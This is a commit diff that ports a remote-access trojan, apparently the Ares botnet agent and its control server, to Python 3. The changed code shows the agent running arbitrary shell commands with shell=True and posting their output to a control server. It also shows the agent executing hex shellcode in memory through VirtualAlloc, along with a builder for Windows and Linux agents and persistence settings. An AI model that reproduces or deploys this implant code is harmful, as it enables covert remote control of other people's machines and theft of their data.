Switch to Python3

golong2025 · Apr 1, 2018 · 1d3415f · 1d3415f
1 parent abc4022
commit 1d3415f
Show file tree

Hide file tree

Showing 4 changed files with 17 additions and 15 deletions.
diff --git a/agent/agent.py b/agent/agent.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python2
+#!/usr/bin/env python3
 # coding: utf-8
 
 import requests
@@ -11,7 +11,7 @@
 import traceback
 import threading
 import uuid
-import StringIO
+import io
 import zipfile
 import tempfile
 import socket
@@ -103,7 +103,7 @@ def send_output(self, output, newlines=True):
         if not output:
             return
         if newlines:
-            output += "\n\n"
+            output += str("\n\n")
         req = requests.post(config.SERVER + '/api/' + self.uid + '/report',
                 verify=config.TLS_VERIFY,
                 data={'output': output})
@@ -119,17 +119,19 @@ def runcmd(self, cmd):
             proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
             out, err = proc.communicate()
             output = (out + err)
+            if os.name == "nt":
+                output = output.decode('cp850')
             self.send_output(output)
         except Exception as exc:
             self.send_output(traceback.format_exc())
 
     @threaded
     def python(self, command_or_file):
         """ Runs a python command or a python file and returns the output """
-        new_stdout = StringIO.StringIO()
+        new_stdout = io.StringIO()
         old_stdout = sys.stdout
         sys.stdout = new_stdout
-        new_stderr = StringIO.StringIO()
+        new_stderr = io.StringIO()
         old_stderr = sys.stderr
         sys.stderr = new_stderr
         if os.path.exists(command_or_file):
@@ -278,7 +280,7 @@ def screenshot(self):
     def execshellcode(self, shellcode_str):
         """ Executes given shellcode string in memory """
         shellcode = shellcode_str.replace('\\x', '')
-        shellcode = shellcode.decode("hex")
+        shellcode = bytes.fromhex(shellcode)
         shellcode = bytearray(shellcode)
         ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                                   ctypes.c_int(len(shellcode)),

diff --git a/agent/builder.py b/agent/builder.py
@@ -9,10 +9,10 @@ def build_agent(output, server_url, platform, hello_interval, idle_time, max_fai
     prog_name = os.path.basename(output)
     platform = platform.lower()
     if platform not in ['linux', 'windows']:
-        print "[!] Supported platforms are 'Linux' and 'Windows'"
+        print("[!] Supported platforms are 'Linux' and 'Windows'")
         exit(0)
     if os.name != 'posix' and platform == 'linux':
-        print "[!] Can only build Linux agents on Linux."
+        print("[!] Can only build Linux agents on Linux.")
         exit(0)
     working_dir = os.path.join(tempfile.gettempdir(), 'ares')
     if os.path.exists(working_dir):
@@ -46,7 +46,7 @@ def build_agent(output, server_url, platform, hello_interval, idle_time, max_fai
     os.chdir(cwd)
     os.rename(agent_file, output)
     shutil.rmtree(working_dir)
-    print "[+] Agent built successfully: %s" % output
+    print("[+] Agent built successfully: %s" % output)
 
 
 def main():

diff --git a/agent/config.py b/agent/config.py
@@ -1,8 +1,8 @@
-SERVER = "http://localhost:8080"
-HELLO_INTERVAL = 2
+SERVER = "http://localhost:5000"
+HELLO_INTERVAL = 1
 IDLE_TIME = 60
-MAX_FAILED_CONNECTIONS = 10
-PERSIST = True
+MAX_FAILED_CONNECTIONS = 100
+PERSIST = False
 TLS_VERIFY = True
 HELP = """
 <any shell command>

diff --git a/server/webui/__init__.py b/server/webui/__init__.py
@@ -24,7 +24,7 @@
 def hash_and_salt(password):
     password_hash = hashlib.sha256()
     salt = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(8))
-    password_hash.update(salt + request.form['password'])
+    password_hash.update(str(salt + request.form['password']).encode('utf8'))
     return password_hash.hexdigest(), salt
 
 
@@ -66,7 +66,7 @@ def login():
     if request.method == 'POST':
         if request.form['password']:
                 password_hash = hashlib.sha256()
-                password_hash.update(admin_user.salt + request.form['password'])
+                password_hash.update(str(admin_user.salt + request.form['password']).encode('utf8'))
                 if admin_user.password == password_hash.hexdigest():
                     session['username'] = 'admin'
                     last_login_time =  admin_user.last_login_time